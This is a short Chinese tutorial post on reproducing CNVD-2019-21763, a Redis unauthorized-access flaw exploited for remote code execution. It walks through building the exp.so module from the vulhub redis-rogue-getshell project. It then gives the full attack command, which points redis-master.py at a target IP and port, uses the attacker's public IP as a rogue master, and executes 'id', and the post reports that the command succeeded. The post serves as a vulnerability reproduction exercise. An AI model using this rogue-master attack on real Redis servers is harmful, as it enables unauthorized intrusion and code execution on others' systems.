本文主要是介绍Redis未授权访问-CNVD-2019-21763复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
Redis未授权访问-CNVD-2019-21763复现
利用项目: https://github.com/vulhub/redis-rogue-getshell
解压后先进入到 RedisModulesSDK目录里面的exp目录下,make编译一下才会产生exp.so文件,后面再利用这个exp.so文件进行远程代码执行
需要python3环境
# 利用命令,命令中的攻击IP要用公网IP
python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp/exp.so -c "id"
进入到exp目录下make一下
来到 redis-master.py文件所属目录下 执行命令,查看id
命令执行成功
这篇关于Redis未授权访问-CNVD-2019-21763复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!